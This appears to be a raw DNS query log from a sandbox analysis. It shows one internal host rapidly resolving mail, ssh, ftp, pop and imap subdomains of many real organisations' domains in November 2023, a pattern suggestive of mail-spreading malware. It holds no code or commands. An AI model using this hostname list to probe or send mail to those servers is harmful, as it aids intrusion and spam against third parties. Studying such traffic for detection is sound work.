                                                                                                                                                                                                    Nov 26, 2023 06:59:33.829176903 CET192.168.2.41.1.1.10xab4dStandard query (0)ftp.foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.829457998 CET192.168.2.41.1.1.10x690aStandard query (0)ftp.ippals.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.832361937 CET192.168.2.41.1.1.10xfea4Standard query (0)mail.foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.894454956 CET192.168.2.41.1.1.10xf1baStandard query (0)www.integraledu.hrA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.983819962 CET192.168.2.41.1.1.10x633Standard query (0)ssh.lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.025192976 CET192.168.2.41.1.1.10xec9aStandard query (0)mail.heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.025976896 CET192.168.2.41.1.1.10xc493Standard query (0)ssh.gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.025976896 CET192.168.2.41.1.1.10xfec1Standard query (0)bayambnag.gov.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.026175976 CET192.168.2.41.1.1.10xe495Standard query (0)xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.082783937 CET192.168.2.41.1.1.10x18caStandard query (0)ssh.sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.084161043 CET192.168.2.41.1.1.10xa0e3Standard query (0)ssh.aoiit.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.097521067 CET192.168.2.41.1.1.10x2c1dStandard query (0)ssh.schor.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.112566948 CET192.168.2.41.1.1.10xf113Standard query (0)ssh.paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.170115948 CET192.168.2.41.1.1.10xa569Standard query (0)gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.172454119 CET192.168.2.41.1.1.10x6d4aStandard query (0)route1.mx.cloudflare.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.736614943 CET192.168.2.41.1.1.10xd93fStandard query (0)ssh.yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.736921072 CET192.168.2.41.1.1.10xa36dStandard query (0)ssh.matttux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.737667084 CET192.168.2.41.1.1.10xa4a0Standard query (0)ibright.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.739182949 CET192.168.2.41.1.1.10x1a31Standard query (0)ssh.ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.102255106 CET192.168.2.41.1.1.10x7e41Standard query (0)ssh.goldenfishcompany.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.114290953 CET192.168.2.41.1.1.10xea49Standard query (0)mailgate.elitebusinesshn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.114290953 CET192.168.2.41.1.1.10xfea4Standard query (0)ssh.firemailbox.clubA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.114639044 CET192.168.2.41.1.1.10x9c3aStandard query (0)ssh.5.e9mbw4ghA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.114897966 CET192.168.2.41.1.1.10xe776Standard query (0)ssh.gstudent.ctu.edu.vnA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.115607977 CET192.168.2.41.1.1.10xde2fStandard query (0)ssh.bosworthacademy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.115607977 CET192.168.2.41.1.1.10x5b66Standard query (0)ssh.kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.118237972 CET192.168.2.41.1.1.10xea6cStandard query (0)ssh.pasarjohar.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.118237972 CET192.168.2.41.1.1.10x1c6bStandard query (0)pasarjohar.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.374453068 CET192.168.2.41.1.1.10xa1b2Standard query (0)ssh.2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.377177000 CET192.168.2.41.1.1.10x29b4Standard query (0)ssh.carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.401623011 CET192.168.2.41.1.1.10x9dbfStandard query (0)ssh.y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.403937101 CET192.168.2.41.1.1.10x9298Standard query (0)y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.406594992 CET192.168.2.41.1.1.10x38bcStandard query (0)ssh.xegge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.406594992 CET192.168.2.41.1.1.10x46ecStandard query (0)ssh.ibright.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.406594992 CET192.168.2.41.1.1.10xfbcStandard query (0)ssh.highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.407300949 CET192.168.2.41.1.1.10x9ac5Standard query (0)gstudent.ctu.edu.vnA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.409331083 CET192.168.2.41.1.1.10x7675Standard query (0)ssh.nohonetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.409331083 CET192.168.2.41.1.1.10x25aStandard query (0)ssh.mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.409331083 CET192.168.2.41.1.1.10x35a0Standard query (0)mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.410506964 CET192.168.2.41.1.1.10xb5a6Standard query (0)ssh.pixiil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.410809040 CET192.168.2.41.1.1.10xba8bStandard query (0)chandigarhuniversityazure.onmicrosoft.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.411196947 CET192.168.2.41.1.1.10xb479Standard query (0)firemailbox.clubA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.412201881 CET192.168.2.41.1.1.10x4976Standard query (0)ssh.chandigarhuniversityazure.onmicrosoft.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.469068050 CET192.168.2.41.1.1.10x6e76Standard query (0)kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.473553896 CET192.168.2.41.1.1.10x83a0Standard query (0)ftp.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.485340118 CET192.168.2.41.1.1.10x8657Standard query (0)ssh.macisis.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.485948086 CET192.168.2.41.1.1.10xaecaStandard query (0)ssh.cardenas.mtz.rimed.cuA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.486715078 CET192.168.2.41.1.1.10x9340Standard query (0)ssh.student.ub.ac.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.499578953 CET192.168.2.41.1.1.10x4e1bStandard query (0)ssh.tnav.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.499578953 CET192.168.2.41.1.1.10x44ceStandard query (0)ssh.dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.500211000 CET192.168.2.41.1.1.10xeb25Standard query (0)highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.500211000 CET192.168.2.41.1.1.10x4d31Standard query (0)ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.500211000 CET192.168.2.41.1.1.10x5023Standard query (0)dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.500399113 CET192.168.2.41.1.1.10x2308Standard query (0)xegge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.501053095 CET192.168.2.41.1.1.10xed9dStandard query (0)mailgate.utlinks.omA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.501053095 CET192.168.2.41.1.1.10x6c3Standard query (0)ssh.healteas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.501053095 CET192.168.2.41.1.1.10x4ae0Standard query (0)mailgate.gstudent.ctu.edu.vnA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.501470089 CET192.168.2.41.1.1.10x66edStandard query (0)member3.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.501694918 CET192.168.2.41.1.1.10xd732Standard query (0)ftp.upn.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.501846075 CET192.168.2.41.1.1.10xb62eStandard query (0)relay.awb-apparatebau.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.502319098 CET192.168.2.41.1.1.10x2618Standard query (0)ssh.schmith.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.502588034 CET192.168.2.41.1.1.10xe448Standard query (0)relay.maxiv.lu.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.502918005 CET192.168.2.41.1.1.10xca07Standard query (0)ssh.member3.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.502918005 CET192.168.2.41.1.1.10x8dceStandard query (0)smtp.schmith.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.503233910 CET192.168.2.41.1.1.10xde07Standard query (0)ssh.heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.503361940 CET192.168.2.41.1.1.10x1d11Standard query (0)smtp.bunasta.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.503745079 CET192.168.2.41.1.1.10x30c0Standard query (0)bosworthacademy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.514672041 CET192.168.2.41.1.1.10x113bStandard query (0)upn.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.519494057 CET192.168.2.41.1.1.10x964bStandard query (0)ftp.cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.519494057 CET192.168.2.41.1.1.10x9762Standard query (0)ssh.ippals.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.519494057 CET192.168.2.41.1.1.10x8fe9Standard query (0)ssh.cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.534351110 CET192.168.2.41.1.1.10xef40Standard query (0)ssh.elitebusinesshn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.544296980 CET192.168.2.41.1.1.10x7215Standard query (0)www.rech.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.544296980 CET192.168.2.41.1.1.10x26aeStandard query (0)ssh.foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.544723988 CET192.168.2.41.1.1.10x4b97Standard query (0)ms86978078.msv1.invalidA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.558655977 CET192.168.2.41.1.1.10x14e2Standard query (0)utlinks.omA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.558655977 CET192.168.2.41.1.1.10xf614Standard query (0)ssh.bayambnag.gov.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.559990883 CET192.168.2.41.1.1.10x597cStandard query (0)ssh.utlinks.omA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.564796925 CET192.168.2.41.1.1.10x8c55Standard query (0)schmith.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.565776110 CET192.168.2.41.1.1.10xc840Standard query (0)foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.566606045 CET192.168.2.41.1.1.10x27d4Standard query (0)smtp.heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.051686049 CET192.168.2.41.1.1.10x5b75Standard query (0)ftp.cardenas.mtz.rimed.cuA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.052294016 CET192.168.2.41.1.1.10xbf2bStandard query (0)ftp.student.ub.ac.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.084332943 CET192.168.2.41.1.1.10xb741Standard query (0)mail.dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.088620901 CET192.168.2.41.1.1.10x7168Standard query (0)mail.highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.089459896 CET192.168.2.41.1.1.10x71abStandard query (0)mail.ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.098056078 CET192.168.2.41.1.1.10x4dfStandard query (0)mail.mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.113218069 CET192.168.2.41.1.1.10x16adStandard query (0)mail.y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.113307953 CET192.168.2.41.1.1.10x4b72Standard query (0)ftp.goldenfishcompany.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.114149094 CET192.168.2.41.1.1.10x1c31Standard query (0)mail.carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.114310026 CET192.168.2.41.1.1.10xa822Standard query (0)sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.115154028 CET192.168.2.41.1.1.10x4c67Standard query (0)mail.2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.115221024 CET192.168.2.41.1.1.10x133bStandard query (0)2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.120438099 CET192.168.2.41.1.1.10x3961Standard query (0)mail.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.121203899 CET192.168.2.41.1.1.10xba7fStandard query (0)ftp.matttux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.126604080 CET192.168.2.41.1.1.10x61e5Standard query (0)mail.kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.126791954 CET192.168.2.41.1.1.10x54b6Standard query (0)ftp.healteas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.127054930 CET192.168.2.41.1.1.10x54d8Standard query (0)ftp.foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.127429008 CET192.168.2.41.1.1.10x3037Standard query (0)ftp.5.e9mbw4ghA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.127819061 CET192.168.2.41.1.1.10x4b6cStandard query (0)pop.sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.128298044 CET192.168.2.41.1.1.10x29baStandard query (0)mail.foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.128515959 CET192.168.2.41.1.1.10xc3edStandard query (0)mail.xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.143383026 CET192.168.2.41.1.1.10xfdc5Standard query (0)ftp.ippals.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.143630981 CET192.168.2.41.1.1.10xddf7Standard query (0)ssh.adm.uksw.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.144119024 CET192.168.2.41.1.1.10xb835Standard query (0)ftp.utlinks.omA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.144411087 CET192.168.2.41.1.1.10xc409Standard query (0)carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.144555092 CET192.168.2.41.1.1.10x403bStandard query (0)mail.sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.157711029 CET192.168.2.41.1.1.10x5230Standard query (0)ssh.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.161870956 CET192.168.2.41.1.1.10xc978Standard query (0)relay.bayambnag.gov.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.162482977 CET192.168.2.41.1.1.10x56beStandard query (0)mail.paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.284157991 CET192.168.2.41.1.1.10x3ed5Standard query (0)adm.uksw.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.295614004 CET192.168.2.41.1.1.10xf9a3Standard query (0)paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.295876026 CET192.168.2.41.1.1.10x6d22Standard query (0)pop.xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.298873901 CET192.168.2.41.1.1.10x619eStandard query (0)schor.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.301179886 CET192.168.2.41.1.1.10xdfd4Standard query (0)pop.2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.152384996 CET192.168.2.41.1.1.10x5875Standard query (0)pop.yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.162362099 CET192.168.2.41.1.1.10x2e1eStandard query (0)pop.carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.168194056 CET192.168.2.41.1.1.10x1ce6Standard query (0)pop.lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.169126034 CET192.168.2.41.1.1.10x3c16Standard query (0)mail.heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.169126034 CET192.168.2.41.1.1.10x700aStandard query (0)xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.170672894 CET192.168.2.41.1.1.10x66e6Standard query (0)imap.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.170672894 CET192.168.2.41.1.1.10xd732Standard query (0)ftp.upn.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.170857906 CET192.168.2.41.1.1.10x113bStandard query (0)upn.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.171268940 CET192.168.2.41.1.1.10xd62eStandard query (0)mailgate.member3.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.171268940 CET192.168.2.41.1.1.10x4d46Standard query (0)pop.paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.172259092 CET192.168.2.41.1.1.10x4502Standard query (0)mail.bosworthacademy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.172259092 CET192.168.2.41.1.1.10xdcaStandard query (0)ssh.gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.206602097 CET192.168.2.41.1.1.10x80acStandard query (0)lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.208132982 CET192.168.2.41.1.1.10xddf0Standard query (0)privatemoe.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.209038973 CET192.168.2.41.1.1.10xa6c9Standard query (0)mail.privatemoe.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.209038973 CET192.168.2.41.1.1.10x374cStandard query (0)relay.adm.uksw.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.215410948 CET192.168.2.41.1.1.10x3549Standard query (0)ftp.schmith.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.222570896 CET192.168.2.41.1.1.10xff43Standard query (0)gspousea.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.231664896 CET192.168.2.41.1.1.10x6a59Standard query (0)ssh.gspousea.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.231664896 CET192.168.2.41.1.1.10xf349Standard query (0)macisis.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.236272097 CET192.168.2.41.1.1.10x4700Standard query (0)student.ub.ac.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.245476961 CET192.168.2.41.1.1.10xe49fStandard query (0)mail.lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.245476961 CET192.168.2.41.1.1.10x20bStandard query (0)yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.245651960 CET192.168.2.41.1.1.10xbc7Standard query (0)lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.245826006 CET192.168.2.41.1.1.10xefd7Standard query (0)smtp.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.246464014 CET192.168.2.41.1.1.10x339dStandard query (0)ssh.schor.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.246685028 CET192.168.2.41.1.1.10xe558Standard query (0)mail.gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.246752977 CET192.168.2.41.1.1.10x99d2Standard query (0)gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.246926069 CET192.168.2.41.1.1.10x39bdStandard query (0)ftp.bayambnag.gov.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.247067928 CET192.168.2.41.1.1.10xbc00Standard query (0)mail.yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.248522043 CET192.168.2.41.1.1.10xe52dStandard query (0)ssh.aoiit.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.249726057 CET192.168.2.41.1.1.10x6e2eStandard query (0)ssh.paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.249988079 CET192.168.2.41.1.1.10x627Standard query (0)ssh.sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.271007061 CET192.168.2.41.1.1.10xf0c8Standard query (0)pop.gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.277357101 CET192.168.2.41.1.1.10x8014Standard query (0)avient-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.277965069 CET192.168.2.41.1.1.10xebf8Standard query (0)pop.mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.278063059 CET192.168.2.41.1.1.10x2ebeStandard query (0)pop.highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.278223038 CET192.168.2.41.1.1.10x8f36Standard query (0)pop.ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.278439045 CET192.168.2.41.1.1.10xc08dStandard query (0)pop.dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.278513908 CET192.168.2.41.1.1.10xb23aStandard query (0)aoiit-store.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.307430983 CET192.168.2.41.1.1.10x1233Standard query (0)ssh.lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.307549000 CET192.168.2.41.1.1.10xffefStandard query (0)pop.kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.308175087 CET192.168.2.41.1.1.10xecStandard query (0)pop.foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.308402061 CET192.168.2.41.1.1.10x5d67Standard query (0)pop.y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.308537006 CET192.168.2.41.1.1.10x749Standard query (0)pop.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.770962954 CET192.168.2.41.1.1.10xb7dfStandard query (0)mailgate.heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.818305969 CET192.168.2.41.1.1.10x7cStandard query (0)imap.bosworthacademy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.859489918 CET192.168.2.41.1.1.10xe0a1Standard query (0)pop.heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.032926083 CET192.168.2.41.1.1.10x9c8dStandard query (0)relay.elitebusinesshn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.474399090 CET192.168.2.41.1.1.10x83fStandard query (0)ww16.ondania.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.514375925 CET192.168.2.41.1.1.10x1ea1Standard query (0)mail.member3.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.516272068 CET192.168.2.41.1.1.10xb082Standard query (0)route2.mx.cloudflare.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.564587116 CET192.168.2.41.1.1.10x400dStandard query (0)mailgate.bunasta.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.565010071 CET192.168.2.41.1.1.10x4a00Standard query (0)relay.utlinks.omA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.565622091 CET192.168.2.41.1.1.10x8ca2Standard query (0)imap.2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.565622091 CET192.168.2.41.1.1.10x518bStandard query (0)ssh.upn.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.566052914 CET192.168.2.41.1.1.10x786fStandard query (0)imap.mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.571948051 CET192.168.2.41.1.1.10x5344Standard query (0)imap.carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.577821970 CET192.168.2.41.1.1.10xd263Standard query (0)imap.sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.579171896 CET192.168.2.41.1.1.10x4424Standard query (0)pop3.sofia-communications.comA (IP address)IN (0x0001)false
